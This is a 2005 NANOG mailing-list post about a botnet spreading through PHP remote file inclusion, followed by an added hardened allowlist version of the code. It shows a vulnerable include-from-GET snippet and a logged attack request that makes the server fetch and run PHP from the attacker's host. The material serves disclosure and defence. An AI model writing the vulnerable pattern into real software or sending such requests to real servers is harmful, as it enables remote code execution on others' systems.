nanog mailing list archives

Re: Destructive botnet originating from Japan


From: "Barrett G. Lyon" <blyon () prolexic com>
Date: Fri, 23 Dec 2005 16:20:00 -0800


Well, it appears that bad code always seems to be the root of problems. According to our research today, the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string:

index.php?test=test

<?php
$test = $_GET['test'];   // attacker-controlled value, used with no validation
include("$test.php");    // include path is built straight from the request

When the include executes, the test string passed from the GET includes execution instructions:

"GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting IRC server) is spreading his code as the include is called, pulling and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this list, but it's pretty nasty.


-Barrett
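The include pattern described in the post, rewritten the way it should have been written: an added example, not code from the post or from any of the affected applications. The page names in the allowlist and the pages/ directory are constructed assumptions.

```php
<?php
// Added example (not from the original post): hardened version of the
// "include a page named by the request" pattern described above.
declare(strict_types=1);

// Only these template names may ever be included. The allowlist and the
// pages/ directory are constructed for this example.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Map a user-supplied page name to an on-disk path, or return null.
 * The raw request value is never used to build the path: it is compared
 * (strictly) against the allowlist and the path is assembled from constants.
 * A value such as "http://203.0.113.5/x" or "../../etc/passwd" is rejected.
 */
function resolve_page(?string $requested): ?string
{
    if ($requested === null || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $requested . '.php';
}

/**
 * Defence in depth: refuse to run at all if the interpreter is configured to
 * let include() fetch code over a URL, which is what the posted attack relies on.
 */
function remote_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (!remote_include_disabled()) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}

$page = resolve_page($_GET['test'] ?? null);
if ($page === null) {
    http_response_code(400);
    exit('unknown page');
}
include $page;
```

The request quoted in the post (`test=http%3A//210.170.60.2/...`) fails the allowlist check and gets a 400 instead of reaching include(); the allow_url_include check stops the remote fetch even if another code path does build a URL.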




